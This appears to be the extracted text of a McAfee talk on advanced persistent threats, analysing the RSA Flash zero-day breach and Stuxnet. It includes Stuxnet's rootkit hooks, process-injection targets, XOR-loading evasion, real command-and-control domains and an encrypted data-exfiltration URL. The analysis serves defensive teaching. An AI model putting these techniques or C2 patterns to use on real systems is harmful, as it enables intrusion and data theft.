RSA hacked in March 2011 using a Adobe Flash vulnerability.CVE2011-0609 discovered as a zero day in March 2011.The carrier Flash file was embedded inside the Excel file.Upon executing the excel file with a vulnerable version of flash player the exploit is triggered It loads shellcode inside memory, performs heap-spraying, and loads a Flash byte stream from memory to exploit the vulnerability.Once the exploit is successful a backdoor (PoisonIvy) is installed on the machine.
Getproperty- Get the named property of the given target.Coerce -Convert a value to the type given by the name argument. This implements the ES4 implicit conversion.
Discovered in July 2010 by VirusBlokAda company in Minsk, BelarusAffecting 14 plants to-date in Iran, Indonesia, India, UK, North America, KoreaTargets Siemens WinCC and SIMATIC Process Control System (PCS7)A user opens a folder that contains the .lnk template files (.pif files also vulnerable)Rootkit drivers signed with valid certificates (Realtek and Jmicron)UPX packed, XOR encoded everywhereOnce loaded, queries Siemens database with known default passwordConnected to C&C servers, sending sensitive dataManipulating the database to control the HMI output and manipulating the PLC’s
Using four 0-day vulnerabilities plus Conficker (MS08-067) *Shortcut icon vulnerability (CVE-2010-2568/MS10-046) – affecting every version of Windows since Windows 2000 (even Win95) (patched Aug. 2)Design flaw in Print Spooler (MS10-061/CVE-2010-2729) (patched on Tues)Two privilege escalations exploits [win32k.sys] (yet to be patched) *
Decrypt the configuration data used by the threatDrop two .sys files and install them as a kernel level rootkitAccess files created by the Siemens Step 7 software packageUpdate itselfDrop more .dll and .dat filesInfect removable drives with custom .lnk filesInject into the lsass.exe process and execute custom codeInject into the iexplore.exe processCheck if certain antivirus applications are runningScan the network for serversRemove itselfCommunicate with the C&C server
Advanced Persistent Threats: Reality or Myth
October 20, 2011Advanced Persistent Threats –Myth or Reality?Rahul MohandasResearch Manager, McAfee
Advanced Persistent Threats Agenda• Threat Landscape – Past, Present & Future• Advanced Persistent Threats – The definition – Phases – Threat vectors – Associated costs• Recent APT Attacks Demystified – RSA Hack & Adobe Flash zero-day – Stuxnet: A step closer to hardware• Simulating a Real World Attack (DEMO) The information in this presentation is provided only for educational purposes and for the convenience of McAfee customers. The information contained herein is subject to2 change without notice, and is provided ―AS IS‖ without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance.
Advanced Persistent ThreatsThe definition• Actors – STATE sponsored / activists / members of organized crime• Motives – Economic & political gain• Targets – IP rich organizations• Goals – Steal sensitive data, monitor communication or disrupt operations3 January 2, 2012
Advanced Persistent ThreatsPhasesStep • 1 ReconnaissanceStep • 2 Establish a backdoorStep • 3 Steal user credentialsStep • 4 Data exfiltrationStep • 5 Maintain persistence4 January 2, 2012
Advanced Persistent ThreatsAssociated costs• APTs are not focusing on costs or revenue.• 0 day cost ~ $100k Vulnerability/Exploit Value Source ―Some exploits‖ $200,000 - $250,000 Various Industry Sources A ―real good‖ exploit over $100,000 Official from SNOsoft research Vista exploit $50,000 Raimund Genes, Trend Micro ―Weaponized exploit‖ $20,000-$30,000 David Maynor, SecureWorks• APTs cost – Stuxnet utilized 4 0-day exploits. If you include the development and weaponized associated cost, the attack was worth well over half a million dollars.6 January 2, 2012
RSA Hack& Adobe Flash zero day7 January 2, 2012
Advanced Persistent ThreatsRSA attack8 January 2, 2012
Advanced Persistent ThreatsHistory of Flash exploits Detection Description First Reported CVE-2007-0071 Vulnerability in June 2008 DefineSceneAndFrameLabelData tag CVE-2010-1297 Vulnerability in AVM2 New June 2010 Function() vulnerability CVE-2010- 2884 Vulnerability in ActionScript Virtual September 2010 Machine 2 CVE-2010-3654 Vulnerability in AVM2 MultiName October 2010 button class CVE-2011-0609 Vulnerability in AVM2 verifier while March 2011 handling branch instructions CVE-2011-0611 Vulnerability in AVM1 bytecode July 20119 January 2, 2012
Advanced Persistent ThreatsSignature evasion techniques• Public function loadBytes (bytes:ByteArray, context:LoaderContext = null):void• Loads from binary data stored in a ByteArray object XOR Key• Bytes:ByteArray — A ByteArray object. The XOR’ed contents of the ByteArray Flash can be any of the file Header formats supported by the Loader class: SWF, GIF, JPEG, or PNG.12 January 2, 2012
StuxnetA step closer to the hardware13 January 2, 2012
Advanced Persistent ThreatStuxnet - overview Siemens PLCs Nuclear Enrichment Centrifuges Propagation exploits FOUR new,enrichment controllers Actual Target: delivery online or via USB drive Initial Specific nuclear unknown vulnerabilities14 January 2, 2012
Advanced Persistent ThreatStuxnet - under the hood CVE-2010- Rootkit MS10-046 2772 Anti-AV MS10-061 Covert Exploits Digital MS08-067 Certificate Stuxnet Worm MS10-073 MS08-092 Propagation USB Drives P2P Network controller15 January 2, 2012
Advanced Persistent ThreatStuxnet – working (cont..)• When the folder is opened in Explorer.exe, the .lnk files exploit the 0-day vulnerability to silently load the first file ~WTR4141.tmp (a DLL file) into memory and pass control to it (execute it) in Explorer.exe address space – Once running, the worm’s rootkit features hide all files names ending in *.lnk and starting with ~wtr (including the the above files) by hooking the following APIs: • FindFirstFileW • FindNextFileW • FindFirstFileExW • NtQueryDirectoryFile • ZwQueryDirectoryFile• Then it loads the 2nd .tmp file, ~WTR4132.tmp file (which is a .CPL file)16 January 2, 2012
Advanced Persistent ThreatStuxnet –MRxCls.sys & MRxNet.sys0xF8153747BAE8B4AE48837EE17172151E• Injects malicious code into existing processes (services.exe, svchost.exe, lsass.exe)• Creates HKLMSystemCurrentControlSet ServicesServicesMRxCls registry key0xCC1DB5360109DE3B857654297D262CA1• Monitors system events and activities (i.e. – new program loading, hides *.tmp files)• Creates HKLMSystemCurrentControlSet ServicesServicesMRxNet registry key17 January 2, 2012
StuxnetCommand and Control (C&C/C2)• Stuxnet attempts to access following C&C servers: – www.mypremierfutbol.com – www.todaysfutbol.com• The data is encrypted and sent: – http://mypremierfutbol.com/index.php?data=66a96e2888c9bb53f503e334 d5d775e99b7905ac6e541529e2dadd4640fa3f995391d36ff2a7c058a21d6 99d2fb4a875ec1ce7a0f9e7dd11b6bfa1fe5377d602c39621b7f329• Malware uses RPC protocol for requesting a service from the client (compromised machine) over the network.• Following actions may be executed as a response to RPC calls: – create process, terminate process, read file, write file, delete file, set file attribute, inject file to a system process18 January 2, 2012
Simulating a Real World Attack (DEMO)19 January 2, 2012